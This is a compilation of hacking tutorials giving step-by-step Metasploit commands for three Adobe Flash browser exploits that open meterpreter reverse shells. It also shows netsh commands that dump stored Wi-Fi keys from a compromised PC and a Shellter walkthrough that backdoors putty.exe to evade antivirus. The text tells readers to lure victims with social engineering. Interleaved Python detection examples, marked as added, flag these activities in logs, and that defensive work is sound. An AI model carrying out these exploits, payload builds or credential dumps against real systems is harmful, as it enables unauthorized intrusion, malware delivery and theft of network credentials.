Hack Windows or Linux PC using Adobe Flash Player ByteArray Use After Free

This module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public in its July 2015 data leak, was described as a Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.

Exploit Targets
Windows 7
Adobe Flash 18.0.0.194
Firefox 38.0.5

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/multi/browser/adobe_flash_hacking_team_uaf
msf exploit (adobe_flash_hacking_team_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_hacking_team_uaf)>set lhost 192.168.0.182 (IP of Local Host)
msf exploit (adobe_flash_hacking_team_uaf)>set srvhost 192.168.0.182
msf exploit (adobe_flash_hacking_team_uaf)>set uripath /
msf exploit (adobe_flash_hacking_team_uaf)>exploit  


Now you have a URL to give to your victim: http://192.168.0.182:8080


Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below


Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

Hack Windows or Linux PC using Adobe Flash opaqueBackground Use After Free

This module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public in its July 2015 data leak, was described as a Use After Free while handling the opaqueBackground property 7 setter of the flash.display.DisplayObject class. This module is an early release tested on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), IE9 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194, Windows 8.1, Firefox and Adobe Flash 18.0.0.203, Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and Windows 8.1, Firefox and Adobe Flash 18.0.0.194.

Exploit Targets
Windows 7
Adobe Flash 18.0.0.194
Firefox 38.0.5

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf exploit (adobe_flash_opaque_background_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_opaque_background_uaf)>set lhost 192.168.0.182 (IP of Local Host)
msf exploit (adobe_flash_opaque_background_uaf)>set srvhost 192.168.0.182
msf exploit (adobe_flash_opaque_background_uaf)>set uripath /
msf exploit (adobe_flash_opaque_background_uaf)>exploit


Now you have a URL to give to your victim: http://192.168.0.182:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below


Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.

How to Gather WIFI Password in Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you have the meterpreter session, use the ‘shell’ command to get a command prompt on the target PC.

Now, to see the wireless network connections on the victim PC, use the netsh command.

Netsh is a command-line utility included in the Windows operating system which allows local and remote configuration of network devices such as interfaces.

netsh wlan show profile


This command will show all profiles of the wireless network connections accessed by the victim PC.


Now we have the network interface profiles. To retrieve the stored security key of a specific network interface profile, use the netsh command again with the profile name specified, such as:
netsh wlan show profile name=tiny key=clear

The above command will show the security key as the Key Content option.


It will also show the network type and SSID name, as well as the authentication used with that security key.
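
Added example, not from the original post: a detection for the two netsh commands above, run over process-creation records. The record layout (modelled on Sysmon Event ID 1 fields), the host names and the ten-minute window are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records: (time, host, command line).
EVENTS = [
    ("2015-07-20T10:02:11", "WS-07", "netsh wlan show profile"),
    ("2015-07-20T10:02:40", "WS-07", "Netsh wlan show profile name=tiny key=clear"),
    ("2015-07-20T11:15:03", "WS-12", "netsh wlan show interfaces"),
    ("2015-07-20T12:30:00", "WS-15", 'netsh.exe WLAN show profiles name="office" key = clear'),
]

# Matches "netsh wlan show profile(s)" regardless of case or a quoted netsh.exe.
LIST_RE = re.compile(r'\bnetsh(\.exe)?"?\s+wlan\s+show\s+profiles?\b', re.I)
# Matches the option that makes netsh print the stored key in plain text.
CLEAR_RE = re.compile(r'\bkey\s*=\s*clear\b', re.I)


def classify(cmdline):
    """Return 'key_dump', 'profile_list' or None for one command line."""
    if not LIST_RE.search(cmdline):
        return None
    return "key_dump" if CLEAR_RE.search(cmdline) else "profile_list"


def detect(events, window=timedelta(minutes=10)):
    """Alert on key dumps; raise severity when the same host listed
    its profiles shortly before (the two-step sequence in the text)."""
    last_list = {}  # host -> time of the most recent profile listing
    alerts = []
    for ts, host, cmdline in sorted(events):  # ISO timestamps sort in time order
        when = datetime.fromisoformat(ts)
        kind = classify(cmdline)
        if kind == "profile_list":
            last_list[host] = when
        elif kind == "key_dump":
            seen = last_list.get(host)
            chained = seen is not None and when - seen <= window
            alerts.append((host, ts, "high" if chained else "medium"))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

A profile listing on its own raises no alert because administrators run it routinely; the key=clear form is the one that exposes the stored key.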

Bypass Antivirus and Hack Remote Windows PC with Shellter


Hey Folks! Welcome back to learning more of what you love to do. That is, evading security of other computer or network. You know that there are various tools to assist you in this. One of such tools is Shellter.
Shellter is an active shellcode insertion tool. It effectively re-encodes payloads (here shellcode) to bypass anti-virus (AV) software. Shellter has proved to be the first dynamic infector for PE (Portable Executable) file format of Windows 32-bit applications.
To use Shellter, you can either create your own shellcode or create one from a framework such as Metasploit. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.
Let’s now discuss the steps to evade an AV software using Shellter in Kali Linux.
Download and Install Shellter
Download Shellter from here. You can download Shellter in Windows and then run it on Kali Linux using Wine. It runs Windows applications on Linux like operating systems. In this way, you can reduce the time required for installation.
You can install Shellter directly on Kali by using the following command:
apt-get install shellter



You can install Wine on Kali with the following command:
apt-get install wine32


Open Shellter
When you open Shellter in Kali in wine mode, it prompts you to choose operation mode.



Choose Operation Mode
Select the mode as ‘a’. It stands for auto. 
Now, you need to choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with an .exe file. In our case, we have copied putty.exe file to the Shellter folder and bound it with shellter.exe file.
When asked for PE Target, type the following command:
/root/Downloads/putty.exe
 


The binding process starts.



Press the Enter key to continue. You may see that the DisASM.dll file gets successfully created.
Enable Stealth Mode
Then, you are prompted to enable stealth mode.
Type ‘y’ for yes.




Select Payload
The screen shows a list of payloads. It asks you whether you want to use a listed payload or custom.
Type ‘L’ to use from listed payload.
Then, it asks you to select payload by index. You can select payload of your choice. In our case, we have selected 1 for Meterpreter_Reverse_TCP


Then you are asked to set LHOST and LPORT. Type the local host IP and the local port on which you want the session. In our case, we have set LHOST as 192.168.1.109 [Attacker IP] and LPORT as 4444.
When you press the Enter key, the payload information is displayed.



A warning message appears and as soon as the injection is verified, you are asked to press the Enter key to continue. When you press the Enter key.
Run Exploit
In a new terminal, type msfconsole to launch the Metasploit framework and execute the following commands:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 4444
exploit




Send PuTTY.exe File to Victim’s Machine
When the victim clicks the putty.exe file, which appears similar to the original putty.exe, the victim gets trapped and we get a meterpreter session.

 



As soon as the victim clicks on the putty.exe file, we will get a meterpreter session as shown in the below image.
The meterpreter session opens and there you are ready to peek into the target system.
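
Added example, not from the original post or from Shellter: because the modified file still looks like PuTTY to the user, endpoint connection records are a practical place to catch it, for instance a putty.exe started from a download folder and connecting to a port such as 4444. The record layout (modelled on Sysmon Event ID 3 fields), the per-tool port baseline and the path markers are assumptions, and the sample events are constructed.

```python
import ntpath

# Constructed outbound-connection records.
EVENTS = [
    {"host": "WS-07", "image": r"C:\Users\amy\Downloads\putty.exe",
     "dst": "192.168.1.109", "port": 4444},
    {"host": "WS-09", "image": r"C:\Program Files\PuTTY\putty.exe",
     "dst": "10.0.5.20", "port": 22},
    {"host": "WS-11", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst": "203.0.113.10", "port": 443},
    {"host": "WS-12", "image": r"C:\Users\bob\AppData\Local\Temp\putty.exe",
     "dst": "10.0.5.20", "port": 22},
]

# Assumed baseline: destination ports each known tool normally uses.
BASELINE = {"putty.exe": {22, 23}, "firefox.exe": {80, 443}}
# Assumed markers for locations a standard user can write to.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")


def score(event):
    """Return the list of reasons this connection looks out of profile."""
    reasons = []
    path = event["image"].lower()
    allowed = BASELINE.get(ntpath.basename(path))
    if allowed is not None and event["port"] not in allowed:
        reasons.append("port outside baseline")
    if any(marker in path for marker in USER_WRITABLE):
        reasons.append("runs from user-writable path")
    return reasons


def triage(events):
    """Return flagged events as (host, binary, port, reasons), worst first."""
    flagged = []
    for event in events:
        reasons = score(event)
        if reasons:
            flagged.append((event["host"], ntpath.basename(event["image"]),
                            event["port"], reasons))
    return sorted(flagged, key=lambda row: -len(row[3]))


if __name__ == "__main__":
    for row in triage(EVENTS):
        print(row)
```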


Hack Remote PC using Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow

This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild in June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043.

Exploit Targets
Windows 7
Windows 8
Firefox 38.0.5
Adobe Flash 18.0.0.160
Adobe Flash 11.2.202.466


Requirement
Attacker: kali Linux

Victim PC: Windows 7


Now type use exploit/multi/browser/adobe_flash_nellymoser_bof
msf exploit (adobe_flash_nellymoser_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flash_nellymoser_bof)>set lhost 192.168.0.125 (IP of Local Host)
msf exploit (adobe_flash_nellymoser_bof)>set srvhost 192.168.0.125
msf exploit (adobe_flash_nellymoser_bof)>set uripath /
msf exploit (adobe_flash_nellymoser_bof)>exploit  


Now you have a URL to give to your victim: http://192.168.0.125:8080

Send the link of the server to the victim via chat or email or any social engineering technique
Now when the victim opens the following link (http://192.168.0.125:8080) a session will be opened as shown below


Now type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
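
Added example, not part of the original tutorials or of Metasploit: all three browser walkthroughs on this page (ByteArray, opaqueBackground and Nellymoser) have the victim load Flash content from a bare IP address on port 8080, which a web proxy can flag. The log format and sample lines are constructed, and the check assumes the proxy records the response content type.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed proxy log: time client method url status content-type
LOG = """\
2015-07-20T09:14:02 10.0.3.21 GET http://192.168.0.182:8080/ 200 text/html
2015-07-20T09:14:03 10.0.3.21 GET http://192.168.0.182:8080/AbCd/x.swf 200 application/x-shockwave-flash
2015-07-20T09:20:44 10.0.3.35 GET http://cdn.example.com/player.swf 200 application/x-shockwave-flash
2015-07-20T09:31:10 10.0.3.40 GET http://10.0.9.5:8080/status 200 application/json
malformed line
"""

STANDARD_PORTS = {80, 443}
SWF_TYPES = {"application/x-shockwave-flash", "application/vnd.adobe.flash.movie"}


def parse(line):
    """Split one log line into a record, or return None if it is malformed."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, client, _method, url, _status, ctype = parts
    target = urlsplit(url)
    try:
        port = target.port or (443 if target.scheme == "https" else 80)
    except ValueError:  # non-numeric or out-of-range port in the URL
        return None
    return {"ts": ts, "client": client, "host": target.hostname or "",
            "port": port, "path": target.path, "ctype": ctype.lower()}


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_flash(log_text):
    """Return (client, server, port) for Flash served from IP:odd-port."""
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        is_swf = rec["ctype"] in SWF_TYPES or rec["path"].lower().endswith(".swf")
        if is_swf and is_ip_literal(rec["host"]) and rec["port"] not in STANDARD_PORTS:
            hits.append((rec["client"], rec["host"], rec["port"]))
    return hits
```

Each client returned is a workstation whose installed Flash version should be compared with the affected versions listed in the module descriptions above.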